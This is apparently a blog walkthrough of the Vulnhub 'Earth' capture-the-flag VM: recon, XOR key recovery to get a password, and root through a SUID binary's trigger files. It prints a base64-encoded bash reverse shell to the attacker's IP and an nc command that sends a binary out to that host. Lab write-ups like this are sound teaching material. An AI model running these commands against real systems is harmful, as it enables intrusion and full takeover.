Vulnhub Earth

Preface

vulnhub earth

https://www.vulnhub.com/entry/the-planets-earth,755/

Target IP

192.168.56.111

Information gathering

nmap -p- --min-rate 10000 192.168.56.111 -oN nmap/port.txt
PORT    STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
nmap -sT -sC -sV -O -p22,80,443 192.168.56.111 -oN nmap/detail.txt
PORT    STATE SERVICE  VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_ 256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Test Page for the HTTP Server on Fedora
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
MAC Address: 08:00:27:AB:7D:4B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), OpenWrt 21.02 (Linux 5.4) (97%), Linux 4.19 (95%), Linux 6.0 (95%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (95%), Linux 5.4 - 5.10 (91%), Linux 2.6.32 (91%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

Ports 80 and 443 are open, but the web service cannot be accessed directly.

The SSL certificate reveals two domain names:

earth.local terratest.earth.local

Add them to the hosts file:

192.168.56.111  earth.local terratest.earth.local

http://earth.local/

(screenshot)

http://terratest.earth.local/

(screenshot)

https://earth.local/

(screenshot)

https://terratest.earth.local/

(screenshot)

The first three pages are identical: each shows some kind of encrypted text.

XOR decryption

dirsearch -u http://earth.local/ -i 200,302,301 -e php,txt,js,bak,html
dirsearch -u https://earth.local/ -i 200,302,301 -e php,txt,js,bak,html
dirsearch -u http://terratest.earth.local/ -i 200,302,301 -e php,txt,js,bak,html
dirsearch -u https://terratest.earth.local/ -i 200,302,301 -e php,txt,js,bak,html

The first three only expose a login form; on https://terratest.earth.local/ a robots.txt file is found:

User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*

The last entry, /testingnotes.*, is interesting. Requesting /testingnotes.txt returns the following text:

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

The encryption algorithm is XOR.

The login username is terra.

testdata.txt holds the test data.

testdata.txt

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

Nothing else stands out in it, so this is presumably the key.

Write a script and try to decrypt:

def xor_decrypt(hex_string, key_text):
    """
    XOR-decrypt a hex string using a repeating text key
    """
    # Convert the hex string to bytes
    cipher_bytes = bytes.fromhex(hex_string)

    # Convert the key text to bytes
    key_bytes = key_text.encode('utf-8')

    # Perform the XOR decryption
    decrypted_bytes = bytearray()
    for i in range(len(cipher_bytes)):
        # Cycle through the key bytes
        key_byte = key_bytes[i % len(key_bytes)]
        decrypted_bytes.append(cipher_bytes[i] ^ key_byte)

    return decrypted_bytes.decode('utf-8', errors='ignore')

def main():
    # Key text
    key_text = """According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."""

    # The three encrypted messages
    messages = [
        "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40",

        "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45",

        "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
    ]

    # Decrypt each of the three messages
    for i, msg in enumerate(messages, 1):
        try:
            decrypted = xor_decrypt(msg, key_text)
            print(f"=== 消息 {i} 解密结果 ===")
            print(decrypted)
            print("\n" + "="*50 + "\n")
        except Exception as e:
            print(f"解密消息 {i} 时出错: {e}")

if __name__ == "__main__":
    main()

Decryption yields:

=== 消息 1 解密结果 ===
vjh6qkxhl*o! radio.wcxrh.%fc&tl$+ytkor:cys7em=&r7_jg#nf(*Q`o#+Ngo7f ?M}|w$yIl&`! ~o-vxanc,'(--ck`z.#Q|cu k&*,8*~ta*#-nngc<o!np&C8iu+5i+bss}!md-.-D~f'd~lrg}&q!0O+`)R6rf( I~of~% rdl"{'`e="f{<`u-C/jubdt!mi#x{sty<g2/sn+`4}l.Hg?:}t-A<ln*7Jj7fsb,

==================================================

=== 消息 2 解密结果 ===
vwtqyn<dydr&9wnpu&l|fdm- }y"xv'&kbayp?crh7oz !d~e!n0.chbu%~d70K8bij%?|fzkoj:\z+'.82=&zchq;*|<d'r*lkn8)dg+cy=cdj "~ma 7hr|a~-* cuep-~qcLqq!n"e1zb6

==================================================

=== 消息 3 解密结果 ===
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

==================================================

The first two are garbage; only the third gives readable data, and it repeats: earthclimatechangebad4humans. This is probably the password for the username found above.

terra:earthclimatechangebad4humans
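Why message 3 came out as the password repeated over and over: XOR is its own inverse, so XOR-ing a ciphertext with its known plaintext gives back the key stream, and the shortest period of that stream is the key. The block below is an added example, not code from the writeup; the sample key and plaintext are constructed, and the same relation is what the writeup's script hit when it used the testdata.txt text against message 3.

```python
from itertools import cycle

def xor_bytes(data, key):
    """XOR data with a repeating key; the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def key_stream(ciphertext, known_plaintext):
    """ciphertext XOR known plaintext = the key stream over the overlap."""
    n = min(len(ciphertext), len(known_plaintext))
    return xor_bytes(ciphertext[:n], known_plaintext[:n])

def find_period(stream):
    """Smallest p with stream[i] == stream[i % p] for every i.
    Falls back to len(stream) when no repeat is visible, i.e. the known
    plaintext was shorter than the key and only a key prefix is recoverable."""
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i % p] for i in range(p, len(stream))):
            return p
    return len(stream)

def recover_key(ciphertext, known_plaintext):
    """Recover a repeating XOR key from one ciphertext/plaintext pair."""
    stream = key_stream(ciphertext, known_plaintext)
    return stream[:find_period(stream)]

# Constructed sample: the sender encrypts a test text it later publishes,
# which is the mistake the challenge notes describe with testdata.txt.
SAMPLE_KEY = b"earthclimatechangebad4humans"
SAMPLE_PLAINTEXT = (b"According to radiometric dating estimation and other "
                    b"evidence, Earth formed over 4.5 billion years ago.")
SAMPLE_CIPHERTEXT = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    # With a 103-byte known plaintext the 28-byte key repeats, so the full key comes back
    print(recover_key(SAMPLE_CIPHERTEXT, SAMPLE_PLAINTEXT).decode())
```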

Login succeeds, and we get an input box that executes commands.

(screenshot)

Commands can be executed, but a reverse shell does not come back; anything containing an IP address fails.

(screenshot)

Base64-encode the payload and execute it:

echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwNy82NjY2IDA+JjE=" | base64 -d | bash

(screenshot)

Binary analysis

find / -perm -4000 2>/dev/null

The SUID search turns up one file of interest:

/usr/bin/reset_root

Running it fails:

(screenshot)

Download it to the local machine:

# target
nc 192.168.56.107 4444 < /usr/bin/reset_root

# kali
nc -lvnp 4444 > reset_root

strace analysis

┌──(root㉿kali)-[/home/kali/vulnhub/earth]
└─# strace ./reset_root
execve("./reset_root", ["./reset_root"], 0x7ffc75c39f70 /* 31 vars */) = 0
brk(NULL) = 0x395bc000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f432c389000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=96754, ...}) = 0
mmap(NULL, 96754, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f432c371000
close(3) = 0
openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000\241\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 896, 64) = 896
fstat(3, {st_mode=S_IFREG|0755, st_size=2191896, ...}) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 896, 64) = 896
mmap(NULL, 2244176, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f432c000000
mmap(0x7f432c028000, 1462272, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x28000) = 0x7f432c028000
mmap(0x7f432c18d000, 540672, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x18d000) = 0x7f432c18d000
mmap(0x7f432c211000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x210000) = 0x7f432c211000
mmap(0x7f432c217000, 52816, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f432c217000
close(3) = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f432c36e000
arch_prctl(ARCH_SET_FS, 0x7f432c36e740) = 0
set_tid_address(0x7f432c36ea10) = 90788
set_robust_list(0x7f432c36ea20, 24) = 0
rseq(0x7f432c36e680, 0x20, 0, 0x53053053) = 0
mprotect(0x7f432c211000, 16384, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ) = 0
mprotect(0x7f432c3cc000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
getrandom("\x75\x38\xb3\xfd\x6f\x54\x58\xba", 8, GRND_NONBLOCK) = 8
munmap(0x7f432c371000, 96754) = 0
fstat(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x4), ...}) = 0
brk(NULL) = 0x395bc000
brk(0x395dd000) = 0x395dd000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0) = ?
+++ exited with 0 +++
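The useful lines in a trace like this are the file probes that fail with ENOENT, because a SUID binary whose behaviour hinges on files that do not yet exist is worth a closer look. The parser below is an added example, not part of the writeup; the embedded log is constructed from the strace lines shown above (stdout interleaving removed), and the loader-noise prefix list is an assumption.

```python
import re

# One strace line: call(args) = retval [ERRNO (description)]
LINE_RE = re.compile(
    r'^(?P<call>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\d+)(?:\s+(?P<err>E[A-Z]+))?')
PATH_RE = re.compile(r'"([^"]*)"')

# Paths the dynamic loader probes on every run; not interesting for triage (assumption)
LOADER_NOISE = ("/etc/ld.so.preload", "/etc/ld.so.cache", "/usr/lib/", "/lib/")

def missing_files(strace_log, calls=("access", "openat", "open", "stat")):
    """Return [(syscall, path)] for file probes that failed with ENOENT,
    in log order, skipping dynamic-loader noise."""
    found = []
    for line in strace_log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m.group("call") not in calls or m.group("err") != "ENOENT":
            continue
        paths = PATH_RE.findall(m.group("args"))
        if not paths:
            continue
        path = paths[-1]  # openat(AT_FDCWD, "path", flags): the path is the last quoted arg
        if not path.startswith(LOADER_NOISE):
            found.append((m.group("call"), path))
    return found

# Constructed from the reset_root trace above, with stdout interleaving removed
SAMPLE_LOG = """\
execve("./reset_root", ["./reset_root"], 0x7ffc75c39f70 /* 31 vars */) = 0
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38) = 38
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44) = 44
exit_group(0) = ?
"""

if __name__ == "__main__":
    for call, path in missing_files(SAMPLE_LOG):
        print(f"{call}: {path}")
```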

Privilege escalation

The program checks for three files under /dev/shm/ and /tmp/:

  1. /dev/shm/kHgTFI5G
  2. /dev/shm/Zw7bV9U5
  3. /tmp/kcM0Wewe

Create these three files and run it again:

(screenshot)

This yields the changed root password:

root:Earth

(screenshot)

Get the flag:

              _-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*$&&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

Vulnhub Earth
http://xiaowu5.cn/2026/03/01/Vulnhub-Earth/
Author: 5
Published: 1 March 2026
License: BY XIAOWU